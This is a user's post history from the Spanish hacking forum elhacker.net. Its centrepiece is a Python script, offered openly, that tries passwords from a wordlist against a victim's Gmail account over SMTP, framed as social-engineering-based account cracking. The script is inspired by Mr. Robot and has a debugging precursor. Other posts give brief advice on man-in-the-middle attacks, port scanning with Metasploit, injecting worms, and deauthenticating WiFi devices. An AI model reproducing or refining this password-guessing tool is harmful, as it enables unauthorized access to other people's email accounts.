|
21
|
Programación / Scripting / Cracking de gmail con python
|
en: 9 Abril 2017, 13:20 pm
|
Buenas a todos
Soy fan de la serie de MR Robot, si alguno a visto la serie Eliot usa un script para hackear los correos electronicos, así que me dió por intentar hacerlo, más o menor lo conseguí, lo malo es que tengo problemas con la conexión gmail, por lo demas bien Aquí dejo el código:
#! /usr/bin/env python import smtplib import sys import os print """ __________ .___ \______ \_____ ______ ________ _ _____________ __| _/ | ___/\__ \ / ___// ___/\ \/ \/ / _ \_ __ \/ __ | | | / __ \_\___ \ \___ \ \ ( <_> ) | \/ /_/ | |____| (____ /____ >____ > \/\_/ \____/|__| \____ | \/ \/ \/ \/ _________ __ \_ ___ \____________ ____ | | __ ___________ / \ \/\_ __ \__ \ _/ ___\| |/ // __ \_ __ \ \ \____| | \// __ \\ \___| <\ ___/| | \/ \______ /|__| (____ /\___ >__|_ \\___ >__| \/ \/ \/ \/ \/ """ smtpserver = smtplib.SMTP("smtp.gmail.com", 587) smtpserver.ehlo() smtpserver.starttls() print "Welcome to Gmail Password Cracker" print "TRYING WITH PASSWORD IN: psw.list" user = raw_input("Enter de victim's email addres: ") passwfile = "psw.list" passwfile = open(passwfile, "r") for password in passwfile: try: smtpserver.login(user, password) print "Password Found: %s", password break; except smtplib.SMTPAuthenticationError: print "Unknow password" break; sys.exit()
Lo más raro es que gmail permita este tipo de ataques y no tenga puesto un cierto número de intentos, lo unico que tenéis que crear es un archivo llamado psw.list en la misma carpeta del script. FUNCIONAMIENTO Este Script funciona con ingeniería social, sacamos información de la víctima ponemos las posibles claves en el archivo, y ya está p0nemos el correo en el script y se acabó
|
|
|
22
|
Seguridad Informática / Hacking / Re: si el payload es dectectado.....
|
en: 9 Abril 2017, 13:03 pm
|
una vez de explotar el objetivo es posible que el corta fuegos del AV corte el acceso a la maquina?
Si el firewall no lo a detectado lo más normal es que lo detecte cuando intentes mandar una petición o a lo mejor ni lo detecta, por defecto viene que se permitan las conexiones si están en redes publicas
|
|
|
23
|
Seguridad Informática / Hacking / Re: Que formas de "autoataque" podria realizar?
|
en: 9 Abril 2017, 12:58 pm
|
Exactamente como a dicho warcry, debes saber que quieres obtener en ese ataque, quieres obtener información de datos de la red, haz un ataque de MIM(man in the middle), quieres atacar un dispositivo, pues escaner de puertos como nmap y metasploit para los exploit, si quieres infectar la red inyecta un gusano, todo es cuestión de lo que quieras
|
|
|
25
|
Programación / Scripting / Error al hacer conexión con gmail | Python
|
en: 1 Abril 2017, 21:48 pm
|
Buenas a todos
Estoy intentando hacer una pequeña conexión introducciendo el correo y la password en el script Lo malo es que me da un error y no se como soluccionarlo si me podéis ayudar os lo agradeceré aquí os dejo el codigo
import smtplib smtpserver = smtplib.SMTP("smtp.gmail.com", 587) smtpserver.ehlo() smtpserver.starttls() user = raw_input("email addres: ") passwfile = raw_input("Pass: ") smtpserver.login(user, passwfile) if smtplib.SMTPAuthenticationError: print "fail" sys.exit() else: print "funciono" sys.exit()
Y este es el error que me da:
File "d.py", line 11, in <module> smtpserver.login(user, passwfile) File "/usr/lib/python2.7/smtplib.py", line 622, in login raise SMTPAuthenticationError(code, resp) smtplib.SMTPAuthenticationError: (534, '5.7.14 <https://accounts.google.com/signin/continue?sarp=1&scc=1&plt=AKgnsbtQ\n5.7.14 92qPdFifk7Ip8DO7p0XoDUY4SsdcMiuMOV-HG44arxEfG3vjbPuGm2zKhf_rOm3IW1qReE\n5.7.14 awsMlk2uVt_-d9pRNpTMjCzRc4xsiYDS6p8EcIj6WLoMzsruy5hGferaG2ijYRNmNeZx26\n5.7.14 em3xB0B2oV6jvVLQCSCxdJZpRcaagyxS3HMjtpsyfcEsIBZUR6ELql0LzSUh4QR_DTUojv\n5.7.14 tq6culS93cZaDiERFWZNqgVcTe46U> Please log in via your web browser and\n5.7.14 then try again.\n5.7.14 Learn more at\n5.7.14 https://support.google.com/mail/answer/78754 r17sm11606858wrc.47 - gsmtp')
|
|
|
26
|
Programación / Scripting / Re: Comando Copy con: de archivo .bat
|
en: 1 Abril 2017, 21:43 pm
|
Pero necesito meter en ese archivo varias lineas de texto no solo una.
un ejemplo seria
start dir cd.
como meto todo eso en un .txt con lo que tu me has dicho?
vale pues la primera linea siempre van como te e puesto las demas van asi >> es lo unico que cambia
|
|
|
27
|
Programación / Scripting / Re: Comando Copy con: de archivo .bat
|
en: 1 Abril 2017, 21:05 pm
|
Buenas. Quiero realizar un bacth el cual cree un archivo pero automáticamente. Me explico con un ejemplo: cd C:\Users\Usuario\Desktop hola soy un ejemplo ^Z
quiero realizar eso pero sin tener que pulsar Control+Z para que guarde el archivo ya que quiero que se cree eso de forma automática en un batch. ¿Alguien sabe como se podría hacer? Gracias de antelación. · Los códigos deben ir en etiquetas GeSHi · Esto va en el subforo de scripting (movido) >aquí las reglas del foro -Engel Lex Con el comando echo te pongo ejemplo echo foro.elhacker.net > archivo.txt
|
|
|
28
|
Seguridad Informática / Hacking Wireless / Re: Ocultar essid ref wifi
|
en: 29 Marzo 2017, 21:37 pm
|
Hola sirve de algo ocultar el essid la red wifi si escanean con movil, Windows o Linux por defecto me podrían ver al escanear o tendrían que bajarse programas para hacerlo? Si fuera así que existen programas o formas de que sirve ocultarla?
Con wifislax se puede averiguar la SSID
|
|
|
29
|
Seguridad Informática / Hacking Wireless / Re: Duda sobre el filtrado de MAC
|
en: 27 Marzo 2017, 21:21 pm
|
no te sigo
¿a que te refieres con denegación de servicios a esa ip?
en tu primer post no hablas de denegacion de servicios y menos hablas de ninguna ip
Si tienes razón pero yo no sabia si los router iban a denegar esta acción así que tengo una pequeña pregunta y vale que no puedas navegar por la web, pero entre comillas estas dentro de la red privada no?, no habría alguna opción de desautentificar a ese dispositivo??
|
|
|
30
|
Seguridad Informática / Hacking Wireless / Re: mi red es vunerable
|
en: 27 Marzo 2017, 21:16 pm
|
LINSET solo recopila ataques de deauth, creo podrias mejorarlo y pasar a lo siguiente aunque eso de afirmar que no es vulnerable a linset por que no capturas handshake es algo prematuro... Ya lo ah dicho engel lex si no esta la key en ese diccionario nunca lo hallara, si usas un diccionario para probar la seguridad, es obvio que debes saber el concepto, solo mediras tu velocidad de kps y nunca la del atacante real, el crackeo no sirve si no esta ahi la clave simple y si tu sabes que tiene el dicc entonces es inutil, o mas bien tonto probarle, solo no esta nunca lo obtendras pero si el atacante tuviera un diccionario donde si esta tu clave wpa/2 entonces...
No me referia ni a linset ni a fluxion XD me refiero a que tu dispositivo movil va buscando a ver si ahi wifis reconocidas cercanas de lo cual se puede realizar un mapeado, y atacarte si te quieren atacar a ti y solamente a ti
|
|
|
|
|
|
|